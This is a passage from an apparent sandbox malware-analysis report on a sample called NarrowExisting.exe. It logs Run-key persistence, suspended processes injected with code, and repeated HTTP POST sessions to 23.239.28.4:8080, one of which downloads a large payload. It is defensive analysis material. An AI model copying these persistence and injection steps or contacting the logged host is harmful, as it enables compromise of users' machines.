| setupapi.dll | 0x75290000 | 0x7542cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| urlmon.dll | 0x75430000 | 0x75565fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| user32.dll | 0x75570000 | 0x7566ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| gdi32.dll | 0x75670000 | 0x756fffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| imm32.dll | 0x75750000 | 0x757affff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msasn1.dll | 0x757b0000 | 0x757bbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| usp10.dll | 0x757c0000 | 0x7585cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| cfgmgr32.dll | 0x75860000 | 0x75886fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shell32.dll | 0x758a0000 | 0x764e9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msvcrt.dll | 0x764f0000 | 0x7659bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| iertutil.dll | 0x765a0000 | 0x7679afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| clbcatq.dll | 0x767a0000 | 0x76822fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| lpk.dll | 0x76830000 | 0x76839fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernelbase.dll | 0x76840000 | 0x76885fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| nsi.dll | 0x76890000 | 0x76895fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sechost.dll | 0x768a0000 | 0x768b8fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ole32.dll | 0x768c0000 | 0x76a1bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| oleaut32.dll | 0x76a20000 | 0x76aaefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wininet.dll | 0x76b40000 | 0x76c34fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| private_0x0000000076cd0000 | 0x76cd0000 | 0x76deefff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| private_0x0000000076df0000 | 0x76df0000 | 0x76ee9fff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| ntdll.dll | 0x76ef0000 | 0x77098fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| normaliz.dll | 0x770a0000 | 0x770a2fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ntdll.dll | 0x770d0000 | 0x7724ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| private_0x000000007efa1000 | 0x7efa1000 | 0x7efa3fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007efa4000 | 0x7efa4000 | 0x7efa6fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007efa7000 | 0x7efa7000 | 0x7efa9fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007efaa000 | 0x7efaa000 | 0x7efacfff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007efad000 | 0x7efad000 | 0x7efaffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x000000007efb0000 | 0x7efb0000 | 0x7efd2fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000000007efd5000 | 0x7efd5000 | 0x7efd7fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007efd8000 | 0x7efd8000 | 0x7efdafff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007efdb000 | 0x7efdb000 | 0x7efddfff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007efde000 | 0x7efde000 | 0x7efdefff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007efdf000 | 0x7efdf000 | 0x7efdffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | Readable |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7fffffeffff | Private Memory | Readable |
|
|
|
- |
|
For performance reasons, the remaining 57 entries are omitted.
The remaining entries can be found in flog.txt. |
||||||||
Created Files
| Filename | File Size | Hash Values | YARA Match | Actions |
|---|---|---|---|---|
| c:\programdata\114e.tmp | 0.00 KB |
MD5:
d41d8cd98f00b204e9800998ecf8427e
SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709 SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
|
|
| c:\programdata\114f.tmp | 0.00 KB |
MD5:
d41d8cd98f00b204e9800998ecf8427e
SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709 SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
|
|
| c:\programdata\1150.tmp | 0.00 KB |
MD5:
d41d8cd98f00b204e9800998ecf8427e
SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709 SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
|
|
| c:\programdata\114e.tmp | 0.08 KB |
MD5:
0b5111a9cc6baab51851f1702403b937
SHA1: e95885d85bd47cc19e1181b046995ccd975fd59d SHA256: 62a0536a5b9d1e3cb2af52a5630c330cd30da7398bcddf4a17af0913fc502819 |
|
|
| c:\programdata\114f.tmp | 0.11 KB |
MD5:
36427ecb2a0faf13af3047c51b29f9c5
SHA1: 9a3fb26927a7aa81255cf8abcc1f1c3e38f28c4f SHA256: ea156f649bb1180b32c6d5be76c0969941ec76d1fface734f401b5327ac57345 |
|
|
Host Behavior
File (9)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\ProgramData\1150.tmp | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| Create Temp File | C:\ProgramData\114E.tmp | path = C:\ProgramData |
|
1 | |
| Create Temp File | C:\ProgramData\114F.tmp | path = C:\ProgramData |
|
1 | |
| Create Temp File | C:\ProgramData\1150.tmp | path = C:\ProgramData |
|
1 | |
| Delete | C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\OverloadGabriola.exe | - |
|
1 | |
| Delete | C:\ProgramData\114E.tmp | - |
|
1 | |
| Delete | C:\ProgramData\114F.tmp | - |
|
1 | |
| Delete | C:\ProgramData\1150.tmp | - |
|
1 | |
| Delete | C:\ProgramData\1150.tmp | - |
|
1 |
Registry (21)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create Key | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run | - |
|
1 | |
| Create Key | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run | - |
|
1 | |
| Create Key | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run | - |
|
1 | |
| Write Value | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run | value_name = NarrowExisting, data = "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\NarrowExisting.exe", size = 142, type = REG_SZ |
|
1 | |
| Write Value | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run | value_name = NarrowExisting, data = "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\NarrowExisting.exe", size = 142, type = REG_SZ |
|
1 | |
| Write Value | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run | value_name = NarrowExisting, data = "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\NarrowExisting.exe", size = 142, type = REG_SZ |
|
6 | |
| Write Value | - | value_name = NarrowExisting, data = "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\NarrowExisting.exe", size = 142, type = REG_SZ |
|
10 |
Process (3)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\NarrowExisting.exe" /scomma "C:\ProgramData\114E.tmp" | os_pid = 0x570, creation_flags = CREATE_SUSPENDED, show_window = SW_HIDE |
|
1 | |
| Create | "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\NarrowExisting.exe" /scomma "C:\ProgramData\114F.tmp" | os_pid = 0x2ac, creation_flags = CREATE_SUSPENDED, show_window = SW_HIDE |
|
1 | |
| Create | "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\NarrowExisting.exe" "C:\ProgramData\1150.tmp" | os_pid = 0xbec, creation_flags = CREATE_SUSPENDED, show_window = SW_HIDE |
|
1 |
Thread (9)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Context | c:\users\aetadzjz\appdata\local\microsoft\windows\narrowexisting.exe | os_tid = 0x7d8 |
|
1 | |
| Get Context | c:\users\aetadzjz\appdata\local\microsoft\windows\narrowexisting.exe | os_tid = 0x664 |
|
1 | |
| Get Context | c:\users\aetadzjz\appdata\local\microsoft\windows\narrowexisting.exe | os_tid = 0x620 |
|
1 | |
| Set Context | c:\users\aetadzjz\appdata\local\microsoft\windows\narrowexisting.exe | os_tid = 0x7d8 |
|
1 | |
| Set Context | c:\users\aetadzjz\appdata\local\microsoft\windows\narrowexisting.exe | os_tid = 0x664 |
|
1 | |
| Set Context | c:\users\aetadzjz\appdata\local\microsoft\windows\narrowexisting.exe | os_tid = 0x620 |
|
1 | |
| Resume | c:\users\aetadzjz\appdata\local\microsoft\windows\narrowexisting.exe | os_tid = 0x7d8 |
|
1 | |
| Resume | c:\users\aetadzjz\appdata\local\microsoft\windows\narrowexisting.exe | os_tid = 0x664 |
|
1 | |
| Resume | c:\users\aetadzjz\appdata\local\microsoft\windows\narrowexisting.exe | os_tid = 0x620 |
|
1 |
Memory (16)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Allocate | "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\NarrowExisting.exe" /scomma "C:\ProgramData\114F.tmp" | address = 0x400000, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 372736 |
|
1 | |
| Get Info | "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\NarrowExisting.exe" /scomma "C:\ProgramData\114E.tmp" | address = 0x400000, allocation_type = MEM_RESET_UNDO, protection_out = PAGE_READONLY, size_out = 4096 |
|
1 | |
| Get Info | "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\NarrowExisting.exe" /scomma "C:\ProgramData\114F.tmp" | address = 0x400000, allocation_type = MEM_RESET_UNDO, protection_out = PAGE_READONLY, size_out = 4096 |
|
1 | |
| Get Info | "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\NarrowExisting.exe" "C:\ProgramData\1150.tmp" | address = 0x400000, allocation_type = MEM_RESET_UNDO, protection_out = PAGE_READONLY, size_out = 4096 |
|
1 | |
| Protect | "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\NarrowExisting.exe" /scomma "C:\ProgramData\114E.tmp" | address = 0x400000, protection = PAGE_EXECUTE_READWRITE, size = 114688 |
|
1 | |
| Protect | "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\NarrowExisting.exe" /scomma "C:\ProgramData\114F.tmp" | address = 0x400000, protection = PAGE_EXECUTE_READWRITE, size = 372736 |
|
1 | |
| Protect | "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\NarrowExisting.exe" "C:\ProgramData\1150.tmp" | address = 0x400000, protection = PAGE_EXECUTE_READWRITE, size = 102400 |
|
1 | |
| Write | "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\NarrowExisting.exe" /scomma "C:\ProgramData\114E.tmp" | address = 0x400000, size = 114688 |
|
1 | |
| Write | "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\NarrowExisting.exe" /scomma "C:\ProgramData\114E.tmp" | address = 0x7efde008, size = 4 |
|
1 | |
| Write | "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\NarrowExisting.exe" /scomma "C:\ProgramData\114E.tmp" | address = 0x7efdf010, size = 4 |
|
1 | |
| Write | "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\NarrowExisting.exe" /scomma "C:\ProgramData\114F.tmp" | address = 0x400000, size = 372736 |
|
1 | |
| Write | "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\NarrowExisting.exe" /scomma "C:\ProgramData\114F.tmp" | address = 0x7efde008, size = 4 |
|
1 | |
| Write | "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\NarrowExisting.exe" /scomma "C:\ProgramData\114F.tmp" | address = 0x7efdf010, size = 4 |
|
1 | |
| Write | "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\NarrowExisting.exe" "C:\ProgramData\1150.tmp" | address = 0x400000, size = 102400 |
|
1 | |
| Write | "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\NarrowExisting.exe" "C:\ProgramData\1150.tmp" | address = 0x7efde008, size = 4 |
|
1 | |
| Write | "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\NarrowExisting.exe" "C:\ProgramData\1150.tmp" | address = 0x7efdf010, size = 4 |
|
1 |
Module (82)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | KERNEL32.dll | base_address = 0x74cb0000 |
|
2 | |
| Load | USER32.dll | base_address = 0x75570000 |
|
1 | |
| Load | advapi32.dll | base_address = 0x750d0000 |
|
5 | |
| Load | crypt32.dll | base_address = 0x74ee0000 |
|
3 | |
| Load | shell32.dll | base_address = 0x758a0000 |
|
5 | |
| Load | urlmon.dll | base_address = 0x75430000 |
|
3 | |
| Load | userenv.dll | base_address = 0x747d0000 |
|
5 | |
| Load | wininet.dll | base_address = 0x76b40000 |
|
3 | |
| Load | wtsapi32.dll | base_address = 0x747b0000 |
|
5 | |
| Load | mpr.dll | base_address = 0x74250000 |
|
2 | |
| Load | netapi32.dll | base_address = 0x74650000 |
|
2 | |
| Load | SAMCLI.DLL | base_address = 0x74240000 |
|
1 | |
| Get Handle | c:\windows\syswow64\user32.dll | base_address = 0x75570000 |
|
1 | |
| Get Filename | c:\windows\syswow64\user32.dll | process_name = c:\users\aetadzjz\appdata\local\microsoft\windows\narrowexisting.exe, file_name_orig = C:\Windows\syswow64\USER32.dll, size = 264 |
|
1 | |
| Get Filename | - | process_name = c:\users\aetadzjz\appdata\local\microsoft\windows\narrowexisting.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\NarrowExisting.exe, size = 260 |
|
21 | |
| Get Address | - | function = VirtualAlloc, ordinal = 0, address_out = 0x18faec |
|
1 | |
| Get Address | - | function = VirtualAlloc, ordinal = 0, address_out = 0x18fb34 |
|
1 | |
| Get Address | - | function = LoadLibraryA, ordinal = 0, address_out = 0x18fba0 |
|
1 | |
| Get Address | - | function = UnmapViewOfFile, ordinal = 0, address_out = 0x18fba0 |
|
2 | |
| Get Address | - | function = GetProcAddress, ordinal = 0, address_out = 0x18fba0 |
|
1 | |
| Get Address | - | function = VirtualAlloc, ordinal = 0, address_out = 0x18fba0 |
|
1 | |
| Get Address | - | function = VirtualProtect, ordinal = 0, address_out = 0x18fba0 |
|
1 | |
| Get Address | - | function = AddVectoredExceptionHandler, ordinal = 0, address_out = 0x18fba0 |
|
1 | |
| Get Address | - | function = RemoveVectoredExceptionHandler, ordinal = 0, address_out = 0x18fba0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = lstrlenA, address_out = 0x74cc5a4b |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = lstrcmpA, address_out = 0x74cdeceb |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLastError, address_out = 0x74cc11c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcessHeap, address_out = 0x74cc14e9 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapAlloc, address_out = 0x770fe026 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapFree, address_out = 0x74cc14c9 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetLastError, address_out = 0x74cc11a9 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcess, address_out = 0x74cc1809 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessId, address_out = 0x74cc11f8 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeConsole, address_out = 0x74d66aa8 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = wsprintfA, address_out = 0x7559ae5f |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WTSGetActiveConsoleSessionId, address_out = 0x74d43f49 |
|
1 |
Service (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Open Manager | database_name = SERVICES_ACTIVE_DATABASE |
|
1 |
System (92)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Computer Name | result_out = YKYD69Q |
|
3 | |
| Get Time | type = Ticks, time = 193862 |
|
1 | |
| Get Time | type = Ticks, time = 194876 |
|
1 | |
| Get Time | type = Ticks, time = 195874 |
|
1 | |
| Get Time | type = Ticks, time = 196873 |
|
1 | |
| Get Time | type = Ticks, time = 197871 |
|
1 | |
| Get Time | type = Ticks, time = 198870 |
|
1 | |
| Get Time | type = Ticks, time = 199868 |
|
1 | |
| Get Time | type = Ticks, time = 200991 |
|
1 | |
| Get Time | type = Ticks, time = 201038 |
|
3 | |
| Get Time | type = Ticks, time = 201100 |
|
2 | |
| Get Time | type = Ticks, time = 201147 |
|
2 | |
| Get Time | type = Ticks, time = 201350 |
|
2 | |
| Get Time | type = Ticks, time = 201865 |
|
1 | |
| Get Time | type = Ticks, time = 202052 |
|
3 | |
| Get Time | type = Ticks, time = 202863 |
|
1 | |
| Get Time | type = Ticks, time = 203050 |
|
1 | |
| Get Time | type = Ticks, time = 203082 |
|
2 | |
| Get Time | type = Ticks, time = 203846 |
|
1 | |
| Get Time | type = Ticks, time = 203893 |
|
1 | |
| Get Time | type = Ticks, time = 204158 |
|
3 | |
| Get Time | type = Ticks, time = 204907 |
|
1 | |
| Get Time | type = Ticks, time = 205047 |
|
3 | |
| Get Time | type = Ticks, time = 205874 |
|
1 | |
| Get Time | type = Ticks, time = 206046 |
|
3 | |
| Get Time | type = Ticks, time = 206872 |
|
1 | |
| Get Time | type = Ticks, time = 207044 |
|
3 | |
| Get Time | type = Ticks, time = 207871 |
|
1 | |
| Get Time | type = Ticks, time = 208042 |
|
3 | |
| Get Time | type = Ticks, time = 208869 |
|
1 | |
| Get Time | type = Ticks, time = 209041 |
|
3 | |
| Get Time | type = Ticks, time = 209259 |
|
1 | |
| Get Time | type = Ticks, time = 209868 |
|
1 | |
| Get Time | type = Ticks, time = 210039 |
|
3 | |
| Get Time | type = Ticks, time = 210726 |
|
1 | |
| Get Time | type = Ticks, time = 210866 |
|
1 | |
| Get Time | type = Ticks, time = 211053 |
|
3 | |
| Get Time | type = Ticks, time = 211864 |
|
1 | |
| Get Time | type = Ticks, time = 212052 |
|
3 | |
| Get Time | type = Ticks, time = 212863 |
|
1 | |
| Get Time | type = Ticks, time = 213050 |
|
3 | |
| Get Time | type = Ticks, time = 213877 |
|
1 | |
| Get Time | type = Ticks, time = 214048 |
|
3 | |
| Get Time | type = Ticks, time = 214891 |
|
1 | |
| Get Time | type = Ticks, time = 215047 |
|
3 | |
| Get Time | type = Ticks, time = 215140 |
|
1 | |
| Get Time | type = Ticks, time = 215874 |
|
1 | |
| Get Time | type = Ticks, time = 216045 |
|
2 | |
| Get Time | type = Ticks, time = 216872 |
|
1 | |
| Get Time | type = Ticks, time = 217044 |
|
2 | |
| Get Info | type = Operating System |
|
3 | |
| Get Info | type = Hardware Information |
|
3 |
Mutex (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Release | - |
|
1 |
Network Behavior
HTTP Sessions (18)
| Information | Value |
|---|---|
| Total Data Sent | 5.78 KB |
| Total Data Received | 686.73 KB |
| Contacted Host Count | 1 |
| Contacted Hosts | 23.239.28.4 |
HTTP Session #1
| Information | Value |
|---|---|
| User Agent | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) |
| Server Name | 23.239.28.4 |
| Server Port | 8080 |
| Data Sent | 329 |
| Data Received | 700556 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Open Session | user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG |
|
1 | |
| Open Connection | protocol = HTTP, server_name = 23.239.28.4, server_port = 8080 |
|
1 | |
| Open HTTP Request | http_verb = POST, http_version = HTTP 1.1, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD |
|
1 | |
| Send HTTP Request | headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = 23.239.28.4 |
|
1 | |
| Query HTTP Info | flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 |
|
1 | |
| Query HTTP Info | flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_CONTENT_LENGTH, size_out = 4 |
|
1 | |
| Read Response | size = 700548, size_out = 700548 |
|
1 | |
| Read Response | size = 0, size_out = 0 |
|
1 | |
| Close Session | - |
|
18 |
HTTP Session #2
| Information | Value |
|---|---|
| User Agent | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) |
| Server Name | 23.239.28.4 |
| Server Port | 8080 |
| Data Sent | 329 |
| Data Received | 156 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Open Session | user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG |
|
1 | |
| Open Connection | protocol = HTTP, server_name = 23.239.28.4, server_port = 8080 |
|
1 | |
| Open HTTP Request | http_verb = POST, http_version = HTTP 1.1, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD |
|
1 | |
| Send HTTP Request | headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = 23.239.28.4 |
|
1 | |
| Query HTTP Info | flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 |
|
1 | |
| Query HTTP Info | flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_CONTENT_LENGTH, size_out = 4 |
|
1 | |
| Read Response | size = 148, size_out = 148 |
|
1 | |
| Read Response | size = 0, size_out = 0 |
|
1 | |
| Close Session | - |
|
18 |
HTTP Session #3
| Information | Value |
|---|---|
| User Agent | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) |
| Server Name | 23.239.28.4 |
| Server Port | 8080 |
| Data Sent | 329 |
| Data Received | 156 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Open Session | user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG |
|
1 | |
| Open Connection | protocol = HTTP, server_name = 23.239.28.4, server_port = 8080 |
|
1 | |
| Open HTTP Request | http_verb = POST, http_version = HTTP 1.1, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD |
|
1 | |
| Send HTTP Request | headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = 23.239.28.4 |
|
1 | |
| Query HTTP Info | flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 |
|
1 | |
| Query HTTP Info | flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_CONTENT_LENGTH, size_out = 4 |
|
1 | |
| Read Response | size = 148, size_out = 148 |
|
1 | |
| Read Response | size = 0, size_out = 0 |
|
1 | |
| Close Session | - |
|
18 |
HTTP Session #4
| Information | Value |
|---|---|
| User Agent | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) |
| Server Name | 23.239.28.4 |
| Server Port | 8080 |
| Data Sent | 329 |
| Data Received | 156 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Open Session | user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG |
|
1 | |
| Open Connection | protocol = HTTP, server_name = 23.239.28.4, server_port = 8080 |
|
1 | |
| Open HTTP Request | http_verb = POST, http_version = HTTP 1.1, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD |
|
1 | |
| Send HTTP Request | headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = 23.239.28.4 |
|
1 | |
| Query HTTP Info | flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 |
|
1 | |
| Query HTTP Info | flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_CONTENT_LENGTH, size_out = 4 |
|
1 | |
| Read Response | size = 148, size_out = 148 |
|
1 | |
| Read Response | size = 0, size_out = 0 |
|
1 | |
| Close Session | - |
|
18 |
HTTP Session #5
| Information | Value |
|---|---|
| User Agent | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) |
| Server Name | 23.239.28.4 |
| Server Port | 8080 |
| Data Sent | 329 |
| Data Received | 156 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Open Session | user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG |
|
1 | |
| Open Connection | protocol = HTTP, server_name = 23.239.28.4, server_port = 8080 |
|
1 | |
